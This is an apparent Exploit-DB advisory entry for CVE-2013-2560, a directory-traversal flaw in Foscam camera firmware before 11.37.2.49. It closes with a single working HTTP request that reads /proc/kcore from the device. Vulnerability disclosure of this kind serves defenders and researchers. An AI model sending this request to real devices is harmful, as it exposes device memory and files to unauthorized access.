Foscam Prior to 11.37.2.49 Directory Traversal Vulnerability

2013-03-01T00:00:00
ID EDB-ID:38356
Type exploitdb
Reporter Frederic Basse
Modified 2013-03-01T00:00:00

Description

Foscam Prior to 11.37.2.49 Directory Traversal Vulnerability. CVE-2013-2560. Remote exploit for hardware platform

                                        
                                            source: http://www.securityfocus.com/bid/58290/info

Foscam is prone to a directory-traversal vulnerability.

Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application. This may aid in further attacks. 

GET //../proc/kcore HTTP/1.0